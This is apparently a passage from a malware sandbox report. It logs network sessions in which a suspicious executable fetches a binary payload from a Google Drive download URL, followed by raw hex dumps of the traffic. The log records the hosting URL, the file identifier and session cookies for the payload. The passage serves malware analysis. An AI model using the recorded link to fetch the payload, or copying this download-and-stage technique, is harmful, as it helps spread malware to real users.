5d db 82 8e 18 6d ed 01 ee 5e 76 fd b6 03 33 fa 9b 40 a1 04 17 d3 9d 29 41 dd e5 a5 3d 3a 3d 38 5a da d7 78 85 ed fa 36 8d 40 95 88 ad Data Ascii: kB~):x;[O?.:h~~{v$M<-cENyQvQ;>-%I_} W%6Uw&}Ht{`a=Q&md&/Z2P5/i{WF(@0q?Rd4H1}"\RVT{]m^v3@)A=:=8Zx6@
2021-10-13 13:52:01 UTC	502	IN	Data Raw: d6 5d 11 1c 16 ba e5 a9 a0 49 00 f2 45 8c ae 34 96 57 33 7c 70 0e 3e 16 2b f6 f2 7f e2 27 4e 28 03 5f 32 ee fb 3d a6 f4 db 2b fc 30 e5 ee 9c 11 ba 0d 65 41 81 93 c2 ac 88 4e e4 77 69 3d 81 f6 d6 07 98 7b f2 ee 15 1d 06 5e a5 49 11 31 e0 e2 c3 d4 41 aa 4d 21 77 1a 01 01 be 2f 9e 9b 44 74 f5 2f 1e b9 3d 5d f7 73 e5 b8 00 e1 3c f9 be e7 f4 10 df 63 52 5f bd 0e 16 46 74 4e 63 e1 04 73 8b b1 02 39 19 e2 bb 8e 59 3c e5 9b 13 e8 7c e0 e8 b9 8c b6 82 90 46 b8 a5 e1 f5 ab 1b c0 8a eb 6d 63 03 22 91 23 57 e3 26 2c a1 3c 52 c6 cb 23 04 67 00 79 a9 85 21 22 8c 30 78 13 ef b7 e6 19 97 fd 9a 3f 56 37 5a 96 32 17 ca c0 fb 12 1d 4e 25 4b f0 ff 58 c2 e0 a7 7e 5c ff 77 d6 38 de d1 53 ed dc 25 8f 6f 62 d5 47 ff 83 91 f6 68 2f e0 2e 1f 8a f2 97 d3 06 1e c0 0d 79 f9 c6 31 40 Data Ascii: ]IE4W3\|p>+'N(_2=+0eANwi={^I1AM!w/Dt/=]s<cR_FtNcs9Y<\|Fmc"#W&,<R#gy!"0x?V7Z2N%KX~\w8S%obGh/.y1@
2021-10-13 13:52:01 UTC	504	IN	Data Raw: 84 d6 ab 7c e8 57 a6 2f 2a 6e 23 a3 47 52 57 e7 3d c8 83 0a 46 1e d1 02 2d 32 2e 8b 7d 83 7a 9b 55 09 69 69 af 76 3e 2d d0 8f 3b 61 be 55 aa 55 61 43 e1 2f 52 8d 5f 0b 09 22 2d 6a f9 71 ea f7 ab 4d d9 03 5d 1a 3d bb 65 55 eb 62 87 41 49 84 50 41 8c 4a 30 55 75 43 2b 23 0a 57 7e dc 71 e7 6a a3 77 5a 56 fe d9 30 39 34 f9 45 46 24 92 72 5c 2a 81 39 88 75 97 bc c0 ee d6 49 13 10 c0 16 66 4e bd 9f a1 e7 0c d4 31 d4 66 e7 de 97 84 b9 fb 3e 70 9f e1 50 96 ba 1e 3d 9b c1 1d 56 f5 08 22 12 f3 0d 36 d7 1a 1d 3b 93 75 01 24 cd 85 e8 a3 25 ad d2 ab 6f cc a4 09 df 39 cb 9e 10 fb 43 65 fc b2 65 af 71 76 36 d8 c7 c9 ec 03 47 83 aa 26 16 4c d1 6c 8a eb 17 52 a7 a3 e7 cf 24 1e 77 cc e4 08 2f fb 24 ec 8a 42 ac d4 4f 38 12 2b c0 6c 4d 7f 99 d5 e0 8f ca c6 52 e6 85 ff f4 70 Data Ascii: \|W/n#GRW=F-2.}zUiiv>-;aUUaC/R_"-jqM]=eUbAIPAJ0UuC+#W~qjwZV094EF$r\9uIfN1f>pP=V"6;u$%o9Ceeqv6G&LlR$w/$BO8+lMRp
2021-10-13 13:52:01 UTC	505	IN	Data Raw: 2a 6d 20 1f 50 5c c7 b1 67 da c2 04 36 f3 da 27 a4 e3 4b 56 4b b6 92 37 69 86 65 15 44 0b c8 9a c7 a4 dd be 2f cc 8a 71 83 90 f5 f3 09 bd ef c4 bb c8 52 c7 93 3a 30 2d 12 2c d0 bb 5a bb fa 3c 4c cf c6 6b 44 a0 e7 40 6f 2b a4 a2 2e 05 4d 5e dd 00 74 e5 70 a9 b1 a6 df c2 4c 03 69 03 ac ca 8e 6a f4 f9 06 11 c1 53 d9 c8 b0 96 11 db f9 80 93 dd 74 e5 1e 93 c5 59 47 5e 8b 69 68 2e 42 03 09 16 ce 21 53 42 93 81 7c 6b 77 0a 7d 2a 5a 89 20 e5 c1 73 95 d0 77 c6 1f 13 0f 99 22 ca 61 7b 6c df c6 a2 52 cc e3 f3 0b f3 fe 46 a1 07 7d 71 1d 9c d3 bf 0a de f1 94 d9 08 99 7a 2c f4 45 3c af d7 84 76 92 c0 b4 d2 d1 ba a1 47 a1 74 ad a5 6c 81 71 ca 79 5a f8 e7 18 ec 5d ee ec 1f a7 b9 c8 55 3a 7c c4 72 45 e6 53 d5 de 96 dc 3f f6 ac eb 7d 92 48 8b ca 32 fd b8 cb 88 8e 19 3a d5 Data Ascii: m P\g6'KVK7ieD/qR:0-,Z<LkD@o+.M^tpLijStYG^ih.B!SB\|kw}Z sw"a{lRF}qz,E<vGtlqyZ]U:\|rES?}H2:
2021-10-13 13:52:01 UTC	506	IN	Data Raw: 43 73 c8 b5 9f fb ba 6e 01 00 70 4e f7 9a 7e 8c 69 5a ed bc 2d fd 7b d2 88 dd bd 11 8a 9d a0 90 34 fa a9 e9 f9 65 5d 54 ef f9 f2 b6 a4 72 56 e4 f6 4b 41 a7 50 23 fe 9b 72 e4 0b 2f 24 f2 c4 6d 37 6b d3 bc 0d cd f8 f1 12 a7 96 8c 08 29 ba 7b 02 6e 4f 47 d4 5f a1 a8 2b b0 f1 87 2f 77 a1 02 5d b1 b1 70 ef 72 e0 a0 31 31 6e 1c a4 6a 5e 8d ef f0 b6 19 ce 62 17 c2 17 10 af 49 bf f0 d1 44 70 94 ed b5 d3 62 e8 e6 ad ae 8e eb 8c c1 88 ad d2 97 c4 39 e1 e4 00 b2 90 24 3d 58 ef d9 96 cc 2b 4e 87 43 80 cf 7e 85 c2 b4 e5 a3 6d d4 ed 4a 65 b2 e1 85 ab 85 a8 b3 be 97 cc 90 36 ba d2 69 4a 42 95 47 4e 87 cb 14 69 2b 49 95 27 ca 73 2c c7 19 2b 2d 91 8a d6 70 1b d0 37 25 68 9f 71 80 63 5d 6b be 3b b8 54 0b 9f ef 3a e4 7a 68 a2 f5 63 3a 86 b2 85 25 46 a9 44 d1 07 ea d8 cc 7b Data Ascii: CsnpN~iZ-{4e]TrVKAP#r/$m7k){nOG_+/w]pr11nj^bIDpb9$=X+NC~mJe6iJBGNi+I's,+-p7%hqc]k;T:zhc:%FD{
2021-10-13 13:52:01 UTC	507	IN	Data Raw: 1f 47 da b4 c0 9f 33 aa 5d ed 1b e8 78 ff d8 00 f1 c3 12 fb 47 6c 7e c4 66 46 2e 92 d9 3d 43 78 b8 43 d8 d0 c7 26 ea 80 66 c5 5f d1 09 c4 16 1d 75 f4 25 3d e5 30 66 64 29 78 84 fe 36 d6 2b 00 a7 c3 2a cc 21 d6 26 2b bd d2 35 79 26 50 9d e0 d4 f6 75 14 ab e0 b2 57 79 22 e7 bc 60 b8 61 55 9c 41 d7 ce 7d f6 23 5a 9f df 79 3a 1b f1 a6 bc 76 ef 6a bd 63 22 0f 03 4d 0a 38 32 4d fc 81 8a 58 61 2e 0f 83 67 20 b3 86 54 a0 90 35 4c 65 f2 c6 d8 7d 9d 05 fa aa 93 3b d5 84 74 ef 81 14 02 d2 96 7a 36 0b 0e c0 f8 01 65 72 80 ec f1 7c 1c 57 e8 94 b1 f5 85 4f 99 f7 11 a5 1c 4b 00 4b 6c 31 7d 6f 1a 19 9f 59 3d 29 f1 51 07 40 d4 5f b2 3c 6c 9a 0a da 5c 97 4f 98 17 3e fb 33 d7 dc 8c 38 95 e1 8d aa 57 2d 4c 08 8a 8a 85 36 fe 37 cc 21 d6 37 f3 b2 c9 e1 4c f0 f2 ba a3 f4 b9 07 Data Ascii: G3]xGl~fF.=CxC&f_u%=0fd)x6+*!&+5y&PuWy"`aUA}#Zy:vjc"M82MXa.g T5Le};tz6er\|WOKKl1}oY=)Q@_<l\O>38W-L67!7L
2021-10-13 13:52:01 UTC	509	IN	Data Raw: 77 75 d5 90 de 79 c6 6a e3 f9 c5 e5 22 19 8a bf 8e 54 01 75 10 6a 10 12 8f a3 67 a7 3f ad 5c 1c 0d 62 0c 36 2e c2 02 ab 65 84 76 4f f2 05 c0 45 65 16 f3 51 56 27 53 01 1b 28 10 56 ea 5c 21 39 a2 50 e1 93 fa aa 8e 5a 9f 60 ed 5c 27 79 f2 78 97 6f d1 57 fa 32 2c de be e6 bf ff 2b 37 5a 54 7a 8a 99 dc d6 9b 80 b9 11 94 fb 20 9a fe e5 ab f1 35 ea d6 82 19 e7 ad 19 7a e4 c0 d0 42 3d 45 e3 cd 04 dd 0f 3b d4 e1 f3 24 6e 15 70 f6 37 c1 fb 5d cc cb 9b 66 73 5f 60 96 93 36 90 86 13 86 c9 84 ad 7b c2 b8 76 f4 ed 4d f8 72 10 fa d7 8d 05 de de c7 90 88 e0 c0 a5 60 a5 b0 44 65 07 86 6c 51 0a 7b b4 09 35 a4 bb b6 89 49 54 fc 87 92 fc 87 7f ac c8 c5 4c 37 66 74 4c 8f 06 8a dc a6 72 b5 e1 e4 c1 a7 01 cd 77 c7 17 32 f5 35 05 e9 0d c5 43 58 4f 7d c8 a4 03 65 f0 08 94 e8 cb Data Ascii: wuyj"Tujg?\b6.evOEeQV'S(V\!9PZ`\'yxoW2,+7ZTz 5zB=E;$np7]fs_`6{vMr`DelQ{5ITL7ftLrw25CXO}e
2021-10-13 13:52:01 UTC	510	IN	Data Raw: 42 54 3c ba 13 85 14 14 5e 5d 43 7b f3 ba 00 5a f5 cc 91 d1 5f 87 a8 17 75 93 06 ca b5 1a 20 e3 54 a2 6b 8a 29 06 46 1d 58 bf 0d 4b e7 14 a9 da e0 09 11 97 95 c7 2d 4f 63 b6 d3 b0 c3 d0 35 26 85 44 f4 4f 7c 47 dc 57 68 af 24 8d 91 45 6e 7e 81 87 e3 d0 de 43 7a b9 1c a8 ff 18 f9 8d 88 3e 08 e5 09 63 b4 cf bf 29 5b 6b c8 47 0f 98 00 0c 9a 47 9e 70 1e 35 ef e8 7e f5 f3 1c 34 a6 35 5a b4 5d 43 30 a1 50 a6 b9 67 3d 05 d6 91 d1 4d 9b 53 07 ab 9e 69 47 cb df b3 6f 64 e2 99 9b 3c 12 af 86 97 6e cb 56 31 eb c4 fa 4b e7 88 b9 5c 06 fb fc dc de d1 28 59 01 ac 76 2a ee e8 05 d0 a7 d0 3a b3 24 5b 1a 8d 09 43 91 94 1a c9 8e 1b 41 2f f9 7e 2d b7 d7 e3 a5 5d 43 0d a9 d4 37 6f c4 03 73 de 7f 23 34 48 03 73 16 46 c1 88 bc 75 6c 09 70 9e 50 6d 04 91 65 1d ee 81 0f e0 ba 58 Data Ascii: BT<^]C{Z_u Tk)FXK-Oc5&DO\|GWh$En~Cz>c)[kGGp5~45Z]C0Pg=MSiGod<nV1K\(Yv*:$[CA/~-]C7os#4HsFulpPmeX
2021-10-13 13:52:01 UTC	511	IN	Data Raw: 0d 87 8d ca 36 ff b0 93 f7 bd c1 4b 7b 87 60 a5 03 ab 59 6e a0 7b f6 11 55 1c 8b be d6 4c 39 d6 b0 4b 89 d3 e3 9d b9 63 33 56 c4 d2 19 fe e4 d1 0c c3 46 18 99 9f 52 17 4e 91 ce fb 5f ef 34 51 2e 14 b0 c8 cd 15 8b f2 34 b5 85 76 c0 32 ef 5b bd 70 5b a5 5a b0 7a 08 ec 25 2d 17 af eb e6 f1 35 87 5f 4c 3c ec b3 00 ec d5 7a 85 4d f7 f1 6b 83 7a 2e 5d 0c 2b d9 87 51 c7 c4 12 63 e0 de a5 f6 11 cb 96 4d 5e cc b9 7c 74 a6 ca 53 29 33 0a de 70 e7 6f 97 38 23 77 6e 21 26 1a f7 ae cb 7d 33 34 8f 62 1d 63 47 1d 6c df d9 ea 09 1c b5 7d 61 bf 5c 82 43 5c 59 a5 eb 49 f6 f1 2a df ff 13 2d c6 68 0b 31 8e 7d 2c 22 c2 07 12 22 5b 13 ea 5d 35 ca 5d 09 ee 08 a0 1e 7b b9 5a dd 05 39 33 ce a5 5b 76 86 9d c5 39 73 c0 c5 e7 42 83 3a ba 36 61 31 ca a5 8f be aa b6 17 65 3c e7 2d fe Data Ascii: 6K{`Yn{UL9Kc3VFRN_4Q.4v2[p[Zz%-5_L<zMkz.]+QcM^\|tS)3po8#wn!&}34bcGl}a\C\YI*-h1},""[]5]{Z93[v9sB:6a1e<-
2021-10-13 13:52:01 UTC	513	IN	Data Raw: ff 9f aa e3 db 99 0c b3 b2 dd 4d c7 85 4f 97 7b 9d 65 7d 8e fb 66 6e 52 06 fe b3 91 62 45 66 1d 03 59 37 4f 8b 2f d2 12 d4 df df 3d 62 95 0e d5 2c 96 32 62 ba 03 cd c7 c2 06 ce cf 1e cc 92 9c 7c cd 14 48 a4 76 27 ff df d8 31 19 64 87 30 31 19 2b 67 15 c3 dd e1 54 e2 45 c0 63 fd 3a 38 35 29 af fc d3 ff e3 db 04 45 93 a2 80 c0 7d c2 75 0c 9f f2 4b 1a 52 b3 86 09 89 23 00 5b d8 de 8b 44 1d b1 c5 90 30 a5 45 75 a3 f3 7c a1 63 5c 89 bb 07 92 00 23 c4 62 cf 72 37 b6 89 91 95 3e c8 63 65 b7 93 36 8f ca 50 b7 f4 d0 86 02 ef 66 66 fe f3 e5 4d c2 28 ad 84 3f b2 71 10 ce 24 46 ec bb a4 70 f2 07 a2 c4 98 bc fd c3 bc 57 0c 79 a4 ea 56 99 05 39 dc 81 bf 5c 9a b4 93 95 d6 d0 36 46 61 48 8a cf 1f e4 70 d4 ec b7 f5 1e 91 0d f5 f5 b9 27 a4 0d da b7 f8 86 57 7f f8 8e 61 68 Data Ascii: MO{e}fnRbEfY7O/=b,2b\|Hv'1d01+gTEc:85)E}uKR#[D0Eu\|c\#br7>ce6PffM(?q$FpWyV9\6FaHp'Wah
2021-10-13 13:52:01 UTC	514	IN	Data Raw: e7 48 af 58 cb ef f2 35 80 b2 83 2a a9 86 3b e1 d4 c5 2a d4 fa c4 a6 73 8c 86 78 b4 05 5b ff 02 07 b8 91 ce 08 a5 a0 be 4f 31 2c 4b 2e 25 30 a1 e0 b9 ca 11 40 63 af 5f 7f b3 c1 dc fb 63 8d 3d 87 85 be b4 fc 26 24 f1 a6 73 f3 6f 5a e4 f9 72 d2 73 3d 6b 76 55 91 f3 f5 ef bd 9e b0 45 e1 72 72 97 ec ba 4c f3 f5 bf c9 50 74 ad c8 e1 5e 11 2b 14 d4 11 57 a8 a6 94 7f fc 40 ca 95 9f 16 ce d3 92 b0 fd 3f 5b bc 5d 3d b5 6c 0e cf 9b db dc f5 d9 d4 1c 29 14 f8 7f 1b 7f 22 04 c8 73 63 a1 5a 93 c3 f8 cf d1 ba c4 65 36 ab e8 eb d0 12 cf 52 c9 6e 53 bb 4b 3f c4 d1 a1 e4 9c 69 36 5a 94 ea 22 d6 2e 10 33 33 17 b1 a3 d8 4c ca 94 e8 af 44 9c 78 6b b3 06 ea 0c 65 2a 8c e6 ca 69 e9 9e 1d 6b 71 61 aa 28 42 db 2f 90 4b 70 45 e3 62 d6 6d 1a 32 b9 5a 0c d1 aa 72 68 b8 4d a3 4b 1c Data Ascii: HX5;sx[O1,K.%0@c_c=&$soZrs=kvUErrLPt^+W@?[]=l)"scZe6RnSK?i6Z".33LDxke*ikqa(B/KpEbm2ZrhMK
2021-10-13 13:52:01 UTC	515	IN	Data Raw: 33 80 54 f8 c7 04 f6 6a e1 82 13 18 10 40 0e 19 8b f3 48 91 e4 1c 25 ba e1 43 80 83 71 6a d7 c0 bf 35 15 7e 8a 70 e4 3c 91 cc 96 16 32 0f 51 f4 28 ba 9c d5 9f f4 69 2f 47 12 fa 7b 6a ef 9f 3f dc dd 42 83 fb 6f b1 8d b3 2c 15 ad ee b2 03 33 72 6f b7 85 0b 3e 57 17 92 90 06 19 54 24 41 dd 5d 43 54 12 7c 7f c8 1d b7 a7 ca ed 76 c3 09 5f a7 e3 85 d5 b6 d5 35 ac a2 c8 14 e2 85 51 cd 10 11 63 0e 5b f2 5c 66 43 f1 d9 25 87 23 4b c4 28 11 7f a5 1a 1d 17 b1 ac 3e 9b 2b 66 27 b2 43 72 9a 67 e7 19 af 27 53 99 cb 57 a8 ad 7b 45 b7 2c 18 3f 8c 41 67 3e 38 cf e2 27 53 c4 eb f8 30 33 a2 91 7e 2f 5c 03 c7 b9 f7 98 dc ba 90 1d d9 71 f0 7b 71 6d f2 4b 7f 8e 44 82 f0 bf 66 2d 31 ac 52 5c 11 c5 ed a0 44 29 ce cf 6d fb 36 fe 18 a0 75 ad 72 cc b9 38 31 d5 64 24 2f a4 ed a1 fa Data Ascii: 3Tj@H%Cqj5~p<2Q(i/G{j?Bo,3ro>WT$A]CT\|v_5Qc[\fC%#K(>+f'Crg'SW{E,?Ag>8'S03~/\q{qmKDf-1R\D)m6ur81d$/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	49831	172.217.168.46	443	C:\Users\user\Desktop\REQUIREMENT.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 13:52:04 UTC	515	OUT	GET /uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache Cookie: NID=511=erCQGVR30AbnlJ5pNFpHsCGAYJ62W5dN4Hm7_6YgJlXNAuvU7WRafMRXMCMPUdUZRh5Qtdjggd8vMSDtMqwA8YkuahRtOx0V3O1S2YDycscUArSU4sks1bjEIiTSreHgGw9rYdsWnbS3-plvVy97QEU2IECEplGBbrpSmmZ_Evs
2021-10-13 13:52:04 UTC	516	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 13 Oct 2021 13:52:04 GMT Location: https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download Content-Security-Policy: script-src 'nonce-sEfjBa10nhbucBTQmoK1jA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-10-13 13:52:04 UTC	517	IN	Data Raw: 31 39 38 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 6f 2d 36 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 Data Ascii: 198<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0o-60-docs.googleusercontent.com/docs/secure
2021-10-13 13:52:04 UTC	517	IN	Data Raw: 73 63 2f 6f 72 34 38 69 68 73 6b 30 76 6d 69 66 35 69 66 75 6c 33 65 34 38 74 62 63 69 6e 6a 62 76 35 35 2f 70 65 6f 74 69 67 63 6a 75 75 74 31 63 72 36 67 30 38 64 35 31 33 64 36 6f 70 63 73 39 33 67 39 2f 31 36 33 34 31 33 33 30 37 35 30 30 30 2f 31 38 32 38 31 38 39 35 36 31 30 38 37 36 33 39 31 32 30 38 2f 30 34 32 32 35 37 39 36 32 37 32 31 32 36 34 37 34 30 31 33 5a 2f 31 63 61 76 6d 76 66 68 42 6b 52 6b 72 35 38 6b 50 62 50 38 79 6d 4d 50 4a 41 45 4a 5a 47 45 31 33 3f 65 3d 64 6f 77 6e 6c 6f 61 64 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: sc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download">here</A>.</BODY></HTML>
2021-10-13 13:52:04 UTC	517	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	49832	172.217.168.33	443	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 13:52:04 UTC	517	OUT	GET /docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0o-60-docs.googleusercontent.com Connection: Keep-Alive Cookie: AUTH_2b3btrhtkn05e9f8mgnbbcclritoc6m9=04225796272126474013Z\|1634133075000\|cco6hf5p2hi2d6l67mrd596u1prmvso4
2021-10-13 13:52:05 UTC	518	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdvleFpYhaqe7Lajo7VFrwVZHj7Q5-5dhHvYE6BwcMKzmCb3D4rMdZzBZ6d11dwmWhDtbcbryn-sxShDDych1Q Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="oodf_BKGjFlg78.bin";filename*=UTF-8''oodf_BKGjFlg78.bin Content-Length: 167488 Date: Wed, 13 Oct 2021 13:52:05 GMT Expires: Wed, 13 Oct 2021 13:52:05 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=vfJ+GA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-10-13 13:52:05 UTC	521	IN	Data Raw: 65 52 7e c8 bd a3 0c da 73 13 7c 05 bd d9 28 7e 01 64 b8 3b d0 7f cf 51 dc 99 26 b0 eb ac cf 92 82 64 85 80 cd 09 5e 97 32 4d b0 fe 61 76 2c 1c a4 43 39 fd ca da b2 10 64 8a d1 0b e2 e5 22 41 1e 9e ae aa d8 33 a2 91 7e 77 df eb ce 32 3f 1b 1c 86 1b 1d da b0 73 bb 59 6e fa b4 9e 1e 44 82 f0 bf 66 2d 31 ac 52 5c 11 c5 ed a0 44 29 ce cf 6d fb 36 fe 18 a0 75 ad 72 cc b9 38 89 d5 64 24 21 bb 57 af fa 24 b9 06 26 c9 54 ef 89 9d b7 c7 de ac 3e 80 fc 08 54 57 6f 1d 8d 38 07 23 74 46 df 44 6e 91 c0 33 65 b3 44 e2 46 67 02 b0 f2 c3 cf 73 0b 2f d5 83 56 1a f6 d7 f4 b3 4a 27 71 a1 74 94 84 e8 93 3c 19 40 3a 2d f9 f6 27 c7 2e 7c 02 99 fc 00 74 3b 28 37 cd 38 37 89 ab d1 29 78 ef 25 ce b4 8e d0 93 db c6 82 0e 22 88 ec 54 77 4e be e0 bc a6 2d c1 c9 2a 8c 0d 0e 87 f7 3d Data Ascii: eR~s\|(~d;Q&d^2Mav,C9d"A3~w2?sYnDf-1R\D)m6ur8d$!W$&T>TWo8#tFDn3eDFgs/VJ'qt<@:-'.\|t;(787)x%"TwN-*=
2021-10-13 13:52:05 UTC	525	IN	Data Raw: c6 a5 38 1b 15 5c 71 44 c7 5f af fe 16 5f d2 f1 a9 7b 85 d2 ab 36 1f fc 8a 9e 41 d8 07 7c de c7 c0 91 53 d7 0f 78 27 d3 56 e8 30 5a da a9 b1 42 2e 02 52 bf 4d 4e 18 3e 28 7b 56 e8 19 ee d7 68 da 79 dc 56 90 53 b5 06 73 25 38 a5 b4 99 f6 09 ef 5b e3 05 c4 86 96 26 2d 76 37 2d b6 e3 32 e0 68 ed 3e b9 52 40 92 33 80 54 f8 c7 04 f6 6a e1 82 13 18 10 40 0e 19 8b f3 48 91 e4 1c 25 ba e1 43 80 83 71 6a d7 c0 bf 35 15 7e 8a 70 e4 3c 91 cc 96 16 32 0f 51 f4 28 ba 9c d5 9f f4 69 2f 47 12 fa 7b 6a ef 9f 3f dc dd 42 83 fb 6f b1 8d b3 2c 15 ad ee b2 03 33 72 6f b7 85 0b 3e 57 17 92 90 06 19 54 24 41 dd 5d 43 54 12 7c 7f c8 1d b7 a7 ca ed 76 c3 09 5f a7 e3 85 d5 b6 d5 35 ac a2 c8 14 e2 85 51 cd 10 11 63 0e 5b f2 5c 66 43 f1 d9 25 87 23 4b c4 28 11 7f a5 1a 1d 17 b1 ac Data Ascii: 8\qD__{6A\|Sx'V0ZB.RMN>({VhyVSs%8[&-v7-2h>R@3Tj@H%Cqj5~p<2Q(i/G{j?Bo,3ro>WT$A]CT\|v_5Qc[\fC%#K(
